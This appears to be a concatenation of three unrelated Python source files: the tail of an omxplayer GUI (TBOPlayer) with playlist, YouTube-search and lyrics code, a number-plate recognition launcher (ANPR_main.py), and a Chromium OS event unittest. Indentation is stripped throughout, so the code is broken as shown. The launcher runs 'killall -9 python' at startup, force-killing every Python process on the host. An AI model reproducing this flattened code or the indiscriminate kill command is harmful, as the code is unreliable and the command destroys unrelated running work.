# new volume ranges from 0 - 60
new_volume = (event.x * self.volume_max)/self.volume_bar.winfo_width()
self.set_volume_bar_step(new_volume)
self.set_volume()
def set_volume_bar_step(self, step):
if step > self.volume_max:
step = self.volume_max
elif step <= 0:
step = 0
if step > self.volume_critical_step:
self.style.configure("volumebar.Horizontal.TProgressbar", foreground='red', background='red')
elif step <= self.volume_critical_step and self.volume_var.get() > self.volume_critical_step:
self.style.configure("volumebar.Horizontal.TProgressbar", foreground='cornflower blue', background='cornflower blue')
self.volume_var.set(step)
def set_volume(self):
if not self.dbus_connected: return
try:
self.omx.volume(self.mB2vol(self.get_mB()))
except Exception:
log.logException()
sys.exc_clear()
return False
def get_mB(self):
return (self.volume_var.get() - self.volume_normal_step) * 100
def vol2dB(self, volume):
return (2000.0 * log10(volume)) / 100
def mB2vol(self, mB):
return pow(10, mB / 2000.0)
# ***************************************
# DISPLAY TRACKS
# ***************************************
def display_selected_track(self,index=None):
index = index if index != None else self.start_track_index
if self.playlist.track_is_selected():
self.track_titles_display.activate(index)
self.display_selected_track_title.set(self.playlist.selected_track()[PlayList.TITLE])
else:
self.display_selected_track_title.set("")
def blank_selected_track(self):
self.display_selected_track_title.set("")
def refresh_playlist_display(self):
self.track_titles_display.delete(0,self.track_titles_display.size())
for index in range(self.playlist.length()):
self.playlist.select(index)
self.track_titles_display.insert(END, self.playlist.selected_track()[PlayList.TITLE])
# ***************************************
# TRACKS AND PLAYLISTS CALLBACKS
# ***************************************
def is_file_supported(self, f):
return from_file(f, mime=True) in self._SUPPORTED_MIME_TYPES
def add_drag_drop(self, action, actions, type, win, X, Y, x, y, data):
data = self.dnd.tcl_list_to_python_list(data)
for item in data:
if item.startswith('http'):
self._add_url(item)
elif os.path.isfile(item):
if item.endswith('.csv'):
self._open_list(item)
else:
self._add_files([item,])
elif os.path.isdir(item):
self.ajoute(item, False)
def add_track(self, path=None):
"""
Opens a dialog box to open files,
then stores the tracks in the playlist.
"""
# get the filez
if path:
filez = path
elif self.options.initial_track_dir == '':
if self.options.last_track_dir != '':
filez = tkFileDialog.askopenfilenames(initialdir=self.options.last_track_dir,parent=self.root,title=_('Choose the file(s)'))
else:
filez = tkFileDialog.askopenfilenames(parent=self.root,title=_('Choose the file(s)'))
else:
filez = tkFileDialog.askopenfilenames(initialdir=self.options.initial_track_dir,parent=self.root,title=_('Choose the file(s)'))
filez = self.root.tk.splitlist(filez)
if filez:
self.options.last_track_dir = filez[0][:filez[0].rindex('/')]
else:
return
self._add_files(filez)
def _add_files(self, filez):
for f in filez:
if not os.path.isfile(f) or not self.is_file_supported(f):
continue
self.file = f
self.file_pieces = self.file.split("/")
self.playlist.append([self.file, self.file_pieces[-1],'',''])
self.track_titles_display.insert(END, self.file_pieces[-1])
# and set the selected track
if len(filez)>1:
index = self.playlist.length() - len(filez)
else:
index = self.playlist.length() - 1
self.playlist.select(index)
def get_dir(self):
if self.options.initial_track_dir:
d = tkFileDialog.askdirectory(initialdir=self.options.initial_track_dir,title=_("Choose a directory"))
elif self.options.last_track_dir:
d = tkFileDialog.askdirectory(initialdir=self.options.last_track_dir,title=_("Choose a directory"))
else:
d = tkFileDialog.askdirectory(title=_("Choose a directory"))
return d
def ajoute(self,dir,recursive):
for f in os.listdir(dir):
try:
n=os.path.join(dir,f)
if recursive and os.path.isdir(n):
self.ajoute(n,True)
if os.path.isfile(n) and self.is_file_supported(n):
self.filename.set(n)
self.file = self.filename.get()
self.file_pieces = self.file.split("/")
self.playlist.append([self.file, self.file_pieces[-1],'',''])
self.track_titles_display.insert(END, self.file_pieces[-1])
except Exception:
log.logException()
sys.exc_clear()
return
def add_dir(self):
dirname = self.get_dir()
if dirname:
self.options.last_track_dir = dirname
self.ajoute(dirname,False)
def add_dirs(self):
dirname = self.get_dir()
if dirname:
self.options.last_track_dir = dirname
self.ajoute(dirname,True)
def add_url(self, *event):
cb = ""
try:
cb = self.root.clipboard_get()
except: pass
d = EditTrackDialog(self.root,_("Add URL"),
_("Title"), "",
_("Location"), "" if cb == "" or not cb.startswith("http") else cb)
if d.result == None:
return
name = d.result[0]
url = d.result[1]
self._add_url(url, name)
def _add_url(self, url, name=''):
if not url:
return
if not name:
name = url
if self.ytdl.is_running(url): return
if self.options.download_media_url_upon == "add" and self.ytdl.whether_to_use_youtube_dl(url):
self.go_ytdl(url)
name = self.YTDL_WAIT_TAG + name
self.playlist.append([url, name, url])
self.track_titles_display.insert(END, name)
self.playlist.select(self.playlist.length()-1)
def youtube_search(self):
def add_url_from_search(link):
if self.ytdl.is_running(link): return
if "list=" in link:
self.go_ytdl(link,playlist=True)
self.display_selected_track_title.set(_("Wait. Loading playlist content..."))
return
result = [link,'','']
self.go_ytdl(link)
result[1] = self.YTDL_WAIT_TAG + result[0]
self.playlist.append(result)
self.track_titles_display.insert(END, result[1])
YoutubeSearchDialog(self.root, add_url_from_search)
def remove_track(self,*event):
if self.playlist.length()>0 and self.playlist.track_is_selected():
if self.playlist.selected_track()[1].startswith(self.YTDL_WAIT_TAG) and self.ytdl_state==self._YTDL_WORKING:
# tell ytdl_state_machine to stop
self.quit_ytdl_sent_signal = True
index= self.playlist.selected_track_index()
self.track_titles_display.delete(index,index)
self.playlist.remove(index)
self.blank_selected_track()
self.display_time.set("")
def edit_track(self):
if self.playlist.track_is_selected():
index= self.playlist.selected_track_index()
d = EditTrackDialog(self.root,_("Edit Track"),
_("Title"), self.playlist.selected_track_title,
_("Location"), self.playlist.selected_track_location)
do_ytdl = False
if d.result and d.result[1] != '':
if (self.options.download_media_url_upon == "add" and not self.playlist.selected_track()[1].startswith(self.YTDL_WAIT_TAG) and
self.ytdl.whether_to_use_youtube_dl(d.result[1])):
do_ytdl = True
d.result[0] = self.YTDL_WAIT_TAG + d.result[0]
d.result = (d.result[1],d.result[0])
self.playlist.replace(index, d.result)
self.playlist.select(index)
self.refresh_playlist_display()
if do_ytdl:
self.go_ytdl(d.result[0])
def select_track(self, event):
"""
user clicks on a track in the display list so try and select it
"""
# needs forgiving int for possible tkinter upgrade
if self.playlist.length()>0:
index = 0
if event:
sel = event.widget.curselection()
if sel:
index=int(sel[0]) if event else 0
self.playlist.select(index)
def select_and_play(self, event=None):
if not hasattr(self, 'select_and_play_pending'):
self.select_and_play_pending = False
if self.play_state == self._OMX_CLOSED:
self.select_and_play_pending = False
self.play_track()
self.track_titles_display.bind("<Double-1>", self.select_and_play)
elif not self.select_and_play_pending and self.playing_location != self.playlist.selected_track_location:
self.track_titles_display.unbind("<Double-1>")
self.select_and_play_pending = True
self.stop_track()
if self.select_and_play_pending:
self.root.after(700, self.select_and_play)
def select_next_track(self):
if self.playlist.length()>0:
if self.start_track_index == None and self.play_state == self._OMX_CLOSED:
index = self.start_track_index = self.playlist.selected_track_index()
elif self.start_track_index == self.playlist.length() - 1:
index = self.start_track_index = 0
else:
index = self.start_track_index = self.start_track_index + 1
self.playlist.select(index)
self.display_selected_track(index)
def random_next_track(self):
if self.playlist.length()>0:
index = self.start_track_index = randint(0,self.playlist.length()-1)
self.playlist.select(index)
self.display_selected_track(index)
def select_previous_track(self):
if self.playlist.length()>0:
if self.start_track_index == None:
index = self.start_track_index = self.playlist.selected_track_index()
elif self.start_track_index == 0:
index = self.start_track_index = self.playlist.length() - 1
else:
index = self.start_track_index = self.start_track_index - 1
self.playlist.select(index)
self.display_selected_track(index)
def remove_waiting_track(self, url):
tracks = self.playlist.waiting_tracks()
if tracks:
for track in tracks:
if track[1][0] == url:
self.track_titles_display.delete(track[0],track[0])
self.playlist.remove(track[0])
self.blank_selected_track()
# ***************************************
# PLAYLISTS
# ***************************************
def open_list_dialog(self):
"""
opens a saved playlist
playlists are stored as textfiles each record being "path","title"
"""
if self.options.initial_playlist_dir=='':
self.filename.set(tkFileDialog.askopenfilename(defaultextension = ".csv",
filetypes = [('csv files', '.csv')],
multiple=False))
else:
self.filename.set(tkFileDialog.askopenfilename(initialdir=self.options.initial_playlist_dir,
defaultextension = ".csv",
filetypes = [('csv files', '.csv')],
multiple=False))
filename = self.filename.get()
if filename=="":
return
self._open_list(filename)
def _open_list(self, filename):
#self.options.last_playlist_dir = ''
ifile = open(filename, 'rb')
pl=csv.reader(ifile)
self.playlist.clear()
self.track_titles_display.delete(0,self.track_titles_display.size())
for pl_row in pl:
if len(pl_row) != 0:
if 'http' in pl_row[0]:
self._add_url(pl_row[0],pl_row[1])
continue
self.playlist.append([pl_row[0],pl_row[1],'',''])
self.track_titles_display.insert(END, pl_row[1])
ifile.close()
self.playlist.select(0)
return
def clear_list(self):
if tkMessageBox.askokcancel(_("Clear Playlist"),_("Clear Playlist")):
self.track_titles_display.delete(0,self.track_titles_display.size())
self.playlist.clear()
self.blank_selected_track()
self.display_time.set("")
def load_youtube_playlist(self):
d = LoadYtPlaylistDialog(self.root)
if not d.result or not "list=" in d.result:
return
else:
self.go_ytdl(d.result,playlist=True)
self.display_selected_track_title.set(_("Wait. Loading playlist content..."))
def save_list(self):
""" save a playlist """
self.filename.set(tkFileDialog.asksaveasfilename(
defaultextension = ".csv",
filetypes = [('csv files', '.csv')]))
filename = self.filename.get()
if filename=="":
return
ofile = open(filename, "wb")
for idx in range(self.playlist.length()):
self.playlist.select(idx)
item = self.playlist.selected_track()[PlayList.LOCATION]
ofile.write ('"' + (item if not 'http' in item else self.playlist.selected_track()[PlayList.LOCATION_BACKUP]) + '","' + self.playlist.selected_track()[PlayList.TITLE]+'"\n')
ofile.close()
return
def show_omx_track_info(self):
try:
tkMessageBox.showinfo(_("Track Information"), self.playlist.selected_track()[PlayList.LOCATION] +"\n\n"+
_("Video: ") + str(self.omx.video) + "\n" +
_("Audio: ") + str(self.omx.audio) + "\n" +
_("Time: ") + str(self.omx.timenf) + "\n" +
_("Misc: ") + str(self.omx.misc))
except: return
# *************************************
# OPTIONS DIALOG CLASS
# ************************************
class OptionsDialog(tkSimpleDialog.Dialog):
def __init__(self, parent, options_file, title=None, ):
# store subclass attributes
self.options_file=options_file
# init the super class
tkSimpleDialog.Dialog.__init__(self, parent, title)
def body(self, master):
config=ConfigParser.ConfigParser()
config.read(self.options_file)
self._config = config
self.geometry_var = config.get('config','geometry',0)
self.full_screen_var = config.get('config','full_screen',0)
self.windowed_mode_coords_var = config.get('config','windowed_mode_coords',0)
self.windowed_mode_resolution_var = config.get('config','windowed_mode_resolution',0)
self.autolyrics_coords_var = config.get('config','autolyrics_coords',0)
self.ltracks_var = config.get('config','ltracks',0)
Label(master, text=_("Audio Output:")).grid(row=0, sticky=W)
self.audio_var=StringVar()
self.audio_var.set(config.get('config','audio',0))
rb_hdmi=Radiobutton(master, text=_("HDMI"), variable=self.audio_var, value="hdmi")
rb_hdmi.grid(row=1,column=0,sticky=W)
rb_local=Radiobutton(master, text=_("Local"), variable=self.audio_var,value="local")
rb_local.grid(row=2,column=0,sticky=W)
rb_auto=Radiobutton(master, text=_("Both"), variable=self.audio_var,value="both")
rb_auto.grid(row=3,column=0,sticky=W)
rb_alsa=Radiobutton(master, text="ALSA", variable=self.audio_var,value="alsa")
rb_alsa.grid(row=4,column=0,sticky=W)
Label(master, text="").grid(row=9, sticky=W)
Label(master, text=_("Mode:")).grid(row=10, sticky=W)
self.mode_var=StringVar()
self.mode_var.set(config.get('config','mode',0))
rb_single=Radiobutton(master, text=_("Single"), variable=self.mode_var, value="single")
rb_single.grid(row=11,column=0,sticky=W)
rb_repeat=Radiobutton(master, text=_("Repeat"), variable=self.mode_var,value="repeat")
rb_repeat.grid(row=12,column=0,sticky=W)
rb_playlist=Radiobutton(master, text=_("Playlist"), variable=self.mode_var,value="playlist")
rb_playlist.grid(row=13,column=0,sticky=W)
rb_rplaylist=Radiobutton(master, text=_("Repeat playlist"), variable=self.mode_var,value="repeat playlist")
rb_rplaylist.grid(row=14,column=0,sticky=W)
rb_shuffle=Radiobutton(master, text=_("Shuffle"), variable=self.mode_var,value="shuffle")
rb_shuffle.grid(row=15,column=0,sticky=W)
Label(master, text="").grid(row=16, sticky=W)
Label(master, text=_("Download from Youtube:")).grid(row=17, sticky=W)
self.youtube_media_format_var=StringVar()
self.youtube_media_format_var.set(config.get('config','youtube_media_format',0))
rb_video=Radiobutton(master, text=_("Video and audio"), variable=self.youtube_media_format_var, value="mp4")
rb_video.grid(row=18,column=0,sticky=W)
rb_audio=Radiobutton(master, text=_("Audio only"), variable=self.youtube_media_format_var, value="m4a")
rb_audio.grid(row=19,column=0,sticky=W)
Label(master, text=_("Youtube media quality:")).grid(row=20, sticky=W)
self.youtube_video_quality_var=StringVar()
self.youtube_video_quality_var.set(config.get('config','youtube_video_quality',0))
om_quality = OptionMenu(master, self.youtube_video_quality_var, "high", "medium", "small")
om_quality.grid(row=21, sticky=W)
Label(master, text=_("Initial directory for tracks:")).grid(row=0, column=2, sticky=W)
self.e_tracks = Entry(master)
self.e_tracks.grid(row=1, column=2)
self.e_tracks.insert(0,config.get('config','tracks',0))
Label(master, text=_("Inital directory for playlists:")).grid(row=2, column=2, sticky=W)
self.e_playlists = Entry(master)
self.e_playlists.grid(row=3, column=2)
self.e_playlists.insert(0,config.get('config','playlists',0))
Label(master, text=_("OMXPlayer location:")).grid(row=10, column=2, sticky=W)
self.e_omx_location = Entry(master)
self.e_omx_location.grid(row=11, column=2)
self.e_omx_location.insert(0,config.get('config','omx_location',0))
Label(master, text=_("OMXPlayer options:")).grid(row=12, column=2, sticky=W)
self.e_omx_options = Entry(master)
self.e_omx_options.grid(row=13, column=2)
self.e_omx_options.insert(0,config.get('config','omx_options',0))
self.subtitles_var = StringVar()
self.cb_subtitles = Checkbutton(master,text=_("Subtitles"),variable=self.subtitles_var, onvalue="on",offvalue="off")
self.cb_subtitles.grid(row=14, column=2, sticky = W)
if config.get('config','subtitles',0)=="on":
self.cb_subtitles.select()
else:
self.cb_subtitles.deselect()
Label(master, text="").grid(row=16, column=2, sticky=W)
Label(master, text=_("youtube-dl location:")).grid(row=17, column=2, sticky=W)
self.e_ytdl_location = Entry(master)
self.e_ytdl_location.grid(row=18, column=2)
self.e_ytdl_location.insert(0,config.get('config','ytdl_location',0))
Label(master, text="").grid(row=19, column=2, sticky=W)
Label(master, text=_("Download actual media URL:")).grid(row=20, column=2, sticky=W)
self.download_media_url_upon_var=StringVar()
self.download_media_url_upon_var.set(_("when adding URL") if config.get('config','download_media_url_upon',0) == "add" else _("when playing URL"))
om_download_media = OptionMenu(master, self.download_media_url_upon_var, _("when adding URL"), _("when playing URL"))
om_download_media.grid(row=21, column=2, sticky=W)
Label(master, text="").grid(row=22, sticky=W)
Label(master, text=_("Interface language:")).grid(row=23, column=0, sticky=W)
self.lang_var=StringVar()
self.lang_var.set(config.get('config','lang',0))
om_lang = OptionMenu(master, self.lang_var,'en','es','fr','pt','pl','ro','ru')
om_lang.grid(row=24, column=0, sticky=W)
Label(master, text="").grid(row=22, sticky=W)
Label(master, text=_("Subtitles language:")).grid(row=23, column=2, sticky=W)
self.subtitles_lang_var=StringVar()
self.subtitles_lang_var.set(config.get('config','subtitles_lang',0))
om_lang = OptionMenu(master, self.subtitles_lang_var,'ar','ch','de','en','es','fr','it','ja','ko','pt','pl','ro','ru')
om_lang.grid(row=24, column=2, sticky=W)
self.forbid_windowed_mode_var = IntVar()
self.forbid_windowed_mode_var.set(int(config.get('config','forbid_windowed_mode',0)))
self.cb_forbid = Checkbutton(master,text=_("Forbid windowed mode"),variable=self.forbid_windowed_mode_var, onvalue=1,offvalue=0)
Label(master, text="").grid(row=51, sticky=W)
self.cb_forbid.grid(row=52, column=2, sticky = W)
if self.forbid_windowed_mode_var.get()==1:
self.cb_forbid.select()
else:
self.cb_forbid.deselect()
self.cue_track_mode_var = IntVar()
self.cue_track_mode_var.set(int(config.get('config','cue_track_mode',0)))
self.cb_cue = Checkbutton(master,text=_("Begin/End track paused"),variable=self.cue_track_mode_var, onvalue=1,offvalue=0)
Label(master, text="").grid(row=51, sticky=W)
self.cb_cue.grid(row=52, column=0, sticky = W)
if self.cue_track_mode_var.get()==1:
self.cb_cue.select()
else:
self.cb_cue.deselect()
self.autoplay_var = IntVar()
self.autoplay_var.set(int(config.get('config','autoplay',0)))
self.cb_autoplay = Checkbutton(master,text=_("Autoplay on start up"), variable=self.autoplay_var, onvalue=1,offvalue=0)
self.cb_autoplay.grid(row=60,columnspan=2, sticky = W)
if self.autoplay_var.get()==1:
self.cb_autoplay.select()
else:
self.cb_autoplay.deselect()
self.ytdl_update_var = IntVar()
self.ytdl_update_var.set(int(config.get('config','ytdl_update',0)))
self.cb_ytdl_update = Checkbutton(master, text=_("Keep youtube-dl up-to-date"), variable=self.ytdl_update_var, onvalue=1, offvalue=0)
self.cb_ytdl_update.grid(row=60,column=2, sticky = W)
if self.ytdl_update_var.get()==1:
self.cb_ytdl_update.select()
else:
self.cb_ytdl_update.deselect()
self.find_lyrics_var = IntVar()
self.cb_find_lyrics = Checkbutton(master,text=_("Find lyrics"),variable=self.find_lyrics_var, onvalue=1,offvalue=0)
self.cb_find_lyrics.grid(row=61,column=0, sticky = W)
if int(config.get('config','find_lyrics',0)) == 1:
self.cb_find_lyrics.select()
else:
self.cb_find_lyrics.deselect()
self.debug_var = StringVar()
self.cb_debug = Checkbutton(master,text=_("Debug"),variable=self.debug_var, onvalue='on',offvalue='off')
self.cb_debug.grid(row=61,column=2, sticky = W)
if config.get('config','debug',0)=='on':
self.cb_debug.select()
else:
self.cb_debug.deselect()
return None # no initial focus
def apply(self):
if self.debug_var.get():
log.setLevel(logging.DEBUG)
else:
log.disableLogging()
self.save_options()
return True
def save_options(self):
""" save the output of the options edit dialog to file"""
config=self._config
if (self.lang_var.get() != config.get('config','lang',0)):
tkMessageBox.showinfo("",_("Restart TBOplayer to change language"))
config.set('config','audio',self.audio_var.get())
config.set('config','subtitles',self.subtitles_var.get())
config.set('config','mode',self.mode_var.get())
config.set('config','playlists',self.e_playlists.get())
config.set('config','tracks',self.e_tracks.get())
config.set('config','ltracks',self.ltracks_var)
config.set('config','omx_options',self.e_omx_options.get())
config.set('config','debug',self.debug_var.get())
config.set('config','youtube_media_format',self.youtube_media_format_var.get())
config.set('config','omx_location',self.e_omx_location.get())
config.set('config','ytdl_location',self.e_ytdl_location.get())
config.set('config','download_media_url_upon',"add" if self.download_media_url_upon_var.get() == _("when adding URL") else "play")
config.set('config','youtube_video_quality',self.youtube_video_quality_var.get())
config.set('config','geometry',self.geometry_var)
config.set('config','full_screen',self.full_screen_var)
config.set('config','windowed_mode_coords',self.windowed_mode_coords_var)
config.set('config','windowed_mode_resolution',self.windowed_mode_resolution_var)
config.set('config','forbid_windowed_mode',self.forbid_windowed_mode_var.get())
config.set('config','cue_track_mode',self.cue_track_mode_var.get())
config.set('config','autoplay',self.autoplay_var.get())
config.set('config','find_lyrics',self.find_lyrics_var.get())
config.set('config','autolyrics_coords',self.autolyrics_coords_var)
config.set('config','lang',self.lang_var.get())
config.set('config','subtitles_lang',self.subtitles_lang_var.get())
config.set('config','ytdl_update',self.ytdl_update_var.get())
with open(self.options_file, 'wb') as configfile:
config.write(configfile)
configfile.close()
# *************************************
# EDIT TRACK DIALOG CLASS
# ************************************
class EditTrackDialog(tkSimpleDialog.Dialog):
def __init__(self, parent, title=None, *args):
#save the extra args to instance variables
self.label_location=args[0]
self.default_location=args[1]
self.label_title=args[2]
self.default_title=args[3]
#and call the base class _init_which uses the args in body
tkSimpleDialog.Dialog.__init__(self, parent, title)
def body(self, master):
Label(master, text=self.label_location).grid(row=0)
Label(master, text=self.label_title).grid(row=1)
self.field1 = Entry(master)
self.field2 = Entry(master)
self.field1.grid(row=0, column=1)
self.field2.grid(row=1, column=1)
self.field1.insert(0,self.default_location)
self.field2.insert(0,self.default_title)
return self.field2 # initial focus on title
def apply(self):
first = self.field1.get()
second = self.field2.get()
self.result = [first, second,'','']
return self.result
# *************************************
# LOAD YOUTUBE PLAYLIST DIALOG
# ************************************
class LoadYtPlaylistDialog(tkSimpleDialog.Dialog):
def __init__(self, parent):
#save the extra args to instance variables
self.label_url="URL"
self.default_url=""
#and call the base class _init_which uses the args in body
tkSimpleDialog.Dialog.__init__(self, parent, _("Load Youtube playlist"))
def body(self, master):
Label(master, text=self.label_url).grid(row=0)
self.field1 = Entry(master)
self.field1.grid(row=0, column=1)
self.field1.insert(0,self.default_url)
return self.field1 # initial focus on title
def apply(self):
self.result = self.field1.get()
return self.result
from urllib import quote_plus
import requests
class YoutubeSearchDialog(Toplevel):
def __init__(self, parent, add_url_function):
# store subclass attributes
self.max_results = 20
self.result_cells = []
self.add_url = add_url_function
# init the super class
Toplevel.__init__(self, parent)
self.transient(parent)
self.title(_("Youtube search"))
self.geometry("390x322")
self.resizable(False,False)
master = self
self.field1 = Entry(master)
self.field1.grid(row=0, column=0)
self.field1.focus_set()
Button(master, width = 5, height = 1, text = _('Search!'),
foreground='black', command = self.search,
background='light grey').grid(row=0, column=1)
Button(master, width = 5, height = 1, text = _('Clear'),
foreground='black', command = self.clear_search,
background='light grey').grid(row=1, column=1)
self.page_lbl = _("Page: ")
self.page_var = tk.StringVar()
self.page_var.set(self.page_lbl)
Label(master, font=('Comic Sans', 9),
fg = 'black', wraplength = 100,
textvariable=self.page_var,
background="light grey").grid(row=0, column=2)
page_btn = Button(master, width = 5, height = 1, text = '1 | 2 | 3',
foreground='black',background='light grey')
page_btn.grid(row=1, column=2)
page_btn.bind("<ButtonRelease-1>", self.search_page)
self.frame = VerticalScrolledFrame(master)
self.frame.grid(row=2,column=0,columnspan=3,rowspan=6)
self.frame.configure_scrolling()
def search(self, page = 0):
fvalue = self.field1.get()
if fvalue == "": return
self.clear_search()
self.page_var.set(self.page_lbl + str(page + 1))
offset = self.max_results * page
try:
search = SearchVideos(fvalue.decode('latin1').encode('utf8'),
offset = offset,
mode = "json",
max_results = self.max_results)
result = json.loads(search.result())['search_result']
self.show_result(result)
except Exception as e:
print("Exception while doing youtube search: ",e)
def search_page(self, event):
wwidth = event.widget.winfo_width()
if event.x < wwidth/3:
page = 0
elif event.x < 2*(wwidth/3):
page = 1
else:
page = 2
self.search(page)
def show_result(self, result):
for r in result:
if (r['link'] is not None and r['link'] != "" and
r['title'] is not None and r['title'] != ""):
yt_result_cell = YtresultCell(
self.frame.interior, self.add_url, r['link'], r['title']
)
self.result_cells.append(yt_result_cell)
return
def clear_search(self):
for r in self.result_cells:
r.destroy()
self.result_cells = []
self.frame.canvas.yview_moveto(0)
return
def apply(self):
return
class YtresultCell(Frame):
def __init__(self, parent, add_url_function, link, title):
Frame.__init__(self, parent)
self.grid(sticky=W)
self.video_name = tk.StringVar()
self.video_link = tk.StringVar()
self.video_link.set(link)
self.add_url = add_url_function
try:
self.video_name.set(title)
except: pass
self.create_widgets()
def create_widgets(self):
if "list=" in self.video_link.get():
self.video_name.set("(playlist) " + self.video_name.get())
Label(self, font=('Comic Sans', 10),
foreground='black', wraplength = 300, height = 2,
textvariable=self.video_name,
background="grey").grid(row = 0, column=0, columnspan=2, sticky=W)
Button(self, width = 5, height = 1, text=_('Add'),
foreground='black', command = self.add_link,
background="light grey").grid(row = 0, column=2, sticky=W)
def add_link(self,*event):
self.add_url(self.video_link.get())
class AutoLyrics(Toplevel):
_ARTIST_TITLE_REXP = re.compile(r"([\w\d.&\\/'` ]*)[-:|~]([\w\d.&\\/'` ]*)", re.UNICODE)
def __init__(self, parent, coords, update_coords_func, track_title):
Toplevel.__init__(self, parent, background="#d9d9d9")
try:
self.geometry(coords)
except:
pass
self.transient(parent)
self.bind('<Configure>', update_coords_func)
self.title(_("Lyrics Finder"))
self.resizable(False,False)
self.lyrics_var = tk.StringVar()
self.lyrics_var.set(_("Trying to grab lyrics from the web..."))
frame = VerticalScrolledFrame(self)
frame.grid()
frame.configure_scrolling()
Label(frame.interior, font=('Comic Sans', 11),
foreground = 'black', wraplength = 378,
textvariable=self.lyrics_var,
background="#d9d9d9").grid(column=0, row=0, columnspan=3, sticky=E+W+N+S)
search_result = self._ARTIST_TITLE_REXP.search(track_title)
if not search_result:
self.nope()
return
title_data = search_result.groups()
artist = title_data[0].strip(' ')
title = title_data[1].strip(' ')
self.get_lyrics(artist, title)
def get_lyrics(self, artist, title):
self._background_thread = Thread(target=self._get_lyrics, args=[artist, title])
self._background_thread.start()
def _get_lyrics(self, artist, title):
try:
api_url = 'http://lyrics.wikia.com/api.php'
api_response = requests.get(api_url, params={
'fmt': 'realjson',
'func': 'getSong',
'artist': artist,
'title': title,
'no_pager': True
}).json()
if not api_response or not 'page_id' in api_response:
raise Exception()
pagesrc = requests.get(api_response['url']).text
parser = LyricWikiParser()
parser.feed(pagesrc)
lyrics = (api_response["artist"] + ": " + api_response["song"] +
"\n -- - -- - -- - -- - -- - -- - -- - -- - -- \n\n" +
parser.result)
self.lyrics_var.set(lyrics)
except:
self.nope()
def nope(self):
self.lyrics_var.set(_("Unable to retrieve lyrics for this track."))
self.after(3000, lambda: self.destroy())
# ***************************************
# MAIN
# ***************************************
if __name__ == "__main__":
datestring="6 Dec 2020"
dbusif_tboplayer = None
try:
bus = dbus.SessionBus()
bus_object = bus.get_object(TBOPLAYER_DBUS_OBJECT, TBOPLAYER_DBUS_PATH, introspect = False)
dbusif_tboplayer = dbus.Interface(bus_object, TBOPLAYER_DBUS_INTERFACE)
except: pass
if dbusif_tboplayer is None:
tk.CallWrapper = ExceptionCatcher
bplayer = TBOPlayer(options)
TBOPlayerDBusInterface(bplayer)
gobject_loop = gobject.MainLoop()
def refresh_player():
try:
bplayer.root.update()
gobject.timeout_add(66, refresh_player)
except:
gobject_loop.quit()
bplayer.shutdown()
def start_gobject():
gobject_loop.run()
gobject.timeout_add(66, refresh_player)
bplayer.root.after(65, start_gobject)
bplayer.root.mainloop()
elif len(sys.argv[1:]) > 0:
dbusif_tboplayer.openFiles(sys.argv[1:])
exit()
|
ANPR_main.py
|
try:
os.system("killall -9 python")
time.sleep(100)
print("old python process killed ")
except:
print("No running python process ")
pass
from ANPR_lp_detection import *
from ANPR_lp_recognition import *
from postprocess_anpr import *
from user_interface import *
import multiprocessing
def main():
print("main start")
Lp_q = multiprocessing.Queue(maxsize = 10)
Vehicle_q = multiprocessing.Queue(maxsize = 10)
NP_Detection = multiprocessing.Process(target= anpr_detection, args=(Lp_q,Vehicle_q,))
NP_Recognision = multiprocessing.Process(target= Lp_recognition, args=(Vehicle_q,Lp_q))
ui_start = multiprocessing.Process(target = img_retrive, args=(Lp_q,))
NP_Detection.start()
NP_Recognision.start()
ui_start.start()
print("main end")
if __name__ == "__main__":
main()
|
event_unittest.py
|
#!/usr/bin/env python3
# Copyright 2018 The Chromium OS Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import json
import threading
import time
import unittest
from cros.factory.test import event
from cros.factory.utils import net_utils
from cros.factory.utils import process_utils
EventType = event.Event.Type
PING = 'PING'
PONG = 'PONG'
class EventTest(unittest.TestCase):
def testConvertJSON(self):
event1 = event.Event(EventType.SET_HTML, html='abc')
event1_json = event1.to_json()
event2 = event.Event.from_json(event1_json)
event2_json = event2.to_json()
self.assertEqual(event1, event2)
event1_dict = json.loads(event1_json)
event2_dict = json.loads(event2_json)
self.assertEqual(event1_dict, event2_dict)
# We add an additional layer of class, so the unittest TestCase finder won't
# find the base class EventServerClientTest.
class Tests:
class EventServerClientTestBase(unittest.TestCase):
has_pong_client = True
def setUp(self):
self.server = event.EventServer()
self.server_thread = process_utils.StartDaemonThread(
target=self.server.serve_forever)
self.clients = []
if self.has_pong_client:
self.pong_client = event.ThreadingEventClient(callback=self._Pong)
self.clients.append(self.pong_client)
def CreateClient(self, callback=None):
# pylint: disable=no-member
if callback is None:
callback = lambda unused_event: None
client = self.client_class(callback=callback)
self.clients.append(client)
return client
def _Pong(self, ev):
if ev.type == PING:
self.pong_client.post_event(event.Event(PONG, msg=ev.msg))
def tearDown(self):
for client in self.clients:
client.close()
net_utils.ShutdownTCPServer(self.server)
self.server_thread.join()
self.server.server_close()
# Make sure we're not leaving any extra threads hanging around after a
# second.
extra_threads = [t for t in threading.enumerate()
if t != threading.current_thread()]
end_time = time.time() + 1
for thread in extra_threads:
thread.join(timeout=end_time - time.time())
self.assertFalse(thread.isAlive(),
"Thread %r still alive after 1 second." % thread)
class EventServerClientTest(EventServerClientTestBase):
def testBasic(self):
# pylint: disable=unnecessary-lambda
client_events = []
pong_got = threading.Event()
def _Callback(ev):
client_events.append(ev)
if ev.type == PONG:
pong_got.set()
client = self.CreateClient(_Callback)
ev = event.Event(PING, msg='msg')
pong_msg = client.request_response(ev, lambda ev: ev.type == PONG)
self.assertEqual(PONG, pong_msg.type)
self.assertEqual('msg', pong_msg.msg)
pong_got.wait()
self.assertEqual(client_events, [ev, pong_msg])
def testTimeout(self):
client = self.CreateClient()
self.assertIsNone(client.wait(lambda ev: ev.type == PONG, timeout=0.1))
class EventServerBlockingClientTest(Tests.EventServerClientTest):
client_class = event.BlockingEventClient
class EventServerThreadingClientTest(Tests.EventServerClientTest):
client_class = event.ThreadingEventClient
class EventUtilityFunctionTest(Tests.EventServerClientTestBase):
client_class = event.BlockingEventClient
def testPostEvent(self):
client = self.CreateClient()
event.PostEvent(event.Event(PING, msg='msg'))
pong_msg = client.wait(lambda ev: ev.type == PONG)
self.assertEqual(PONG, pong_msg.type)
self.assertEqual('msg', pong_msg.msg)
def testPostNewEvent(self):
client = self.CreateClient()
event.PostNewEvent(PING, msg='msg')
pong_msg = client.wait(lambda ev: ev.type == PONG)
self.assertEqual(PONG, pong_msg.type)
self.assertEqual('msg', pong_msg.msg)
def testSendEvent(self):
pong_msg = event.SendEvent(
event.Event(PING, msg='msg'), lambda ev: ev.type == PONG)
self.assertEqual(PONG, pong_msg.type)
